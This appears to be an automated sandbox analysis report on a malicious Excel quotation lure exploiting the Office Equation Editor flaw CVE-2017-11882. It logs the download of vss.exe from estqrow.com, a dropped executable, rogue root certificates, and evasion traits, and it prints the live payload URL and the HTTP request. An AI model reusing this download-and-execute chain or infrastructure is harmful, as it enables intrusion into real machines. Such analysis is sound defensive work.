Windows Analysis Report
Quotation_398893.xlam.xlsx

Overview

General Information

Sample name: Quotation_398893.xlam.xlsx
Analysis ID: 1530599
MD5: 8ab8d813d3ca68c8effdb8abbf4a4f86
SHA1: f26fa096a70eec2a9900e363f63a1e6cafe5e8d4
SHA256: 11a5d3add86410357163004a54f22335583b895a390e7eaf567e423ac7ccfeff
Tags: CVE-2017-11882, xlam, xlsx, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: Quotation_398893.xlam.xlsx Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Virustotal: Detection: 6%
Source: Quotation_398893.xlam.xlsx ReversingLabs: Detection: 71%
Source: Quotation_398893.xlam.xlsx Virustotal: Detection: 50%

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 154.38.177.76 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: Binary string: F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp, opponbvew.exe, 00000004.00000000.467095355.0000000000CD6000.00000008.00000001.01000000.00000004.sdmp, vss[1].exe.1.dr, opponbvew.exe.1.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_03610775 WinExec,ExitProcess, 1_2_03610775
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW, 1_2_036106C1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_0361072A URLDownloadToFileW, 1_2_0361072A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_03610649 URLDownloadToFileW, 1_2_03610649
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_036106DB URLDownloadToFileW, 1_2_036106DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_03610795 ExitProcess, 1_2_03610795
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_03610614 ExitProcess, 1_2_03610614
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Code function: 4x nop then dec eax 4_2_000007FE8B6F4201
Source: global traffic DNS query: name: estqrow.com
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic HTTP traffic detected: GET /rt/vss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: estqrow.comConnection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: estqrow.com
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.0000000000314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estqrow.com/
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000001.00000002.468050895.00000000002C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estqrow.com/rt/vss.exe
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estqrow.com/rt/vss.exeC:
Source: EQNEDT32.EXE, 00000001.00000002.468050895.00000000002DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estqrow.com/rt/vss.exehhC:
Source: EQNEDT32.EXE, 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estqrow.com/rt/vss.exej
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary

Source: sheet1.xml, type: SAMPLE Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: Quotation_398893.xlam.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sheet1.xml, type: SAMPLE Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engine Classification label: mal100.expl.winXLSX@4/4@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Quotation_398893.xlam.xlsx
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8A54.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Quotation_398893.xlam.xlsx ReversingLabs: Detection: 71%
Source: Quotation_398893.xlam.xlsx Virustotal: Detection: 50%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: credssp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ncrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: bcrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Section loaded: rpcrtremote.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Quotation_398893.xlam.xlsx Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp, opponbvew.exe, 00000004.00000000.467095355.0000000000CD6000.00000008.00000001.01000000.00000004.sdmp, vss[1].exe.1.dr, opponbvew.exe.1.dr
Source: Quotation_398893.xlam.xlsx Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_0361006C push eax; ret 1_2_0361006D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_03610278 push edi; iretd 1_2_0361027C
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Code function: 4_2_000007FE8B6F00BD pushad ; iretd 4_2_000007FE8B6F00C1
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Code function: 4_2_000007FE8B6F00CD pushad ; iretd 4_2_000007FE8B6F00C1

Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Memory allocated: 130000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Memory allocated: 1A610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3744 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_0361079C mov edx, dword ptr fs:[00000030h] 1_2_0361079C
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Memory allocated: page read and write | page guard
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe Queries volume information: C:\Users\user\AppData\Local\Temp\opponbvew.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid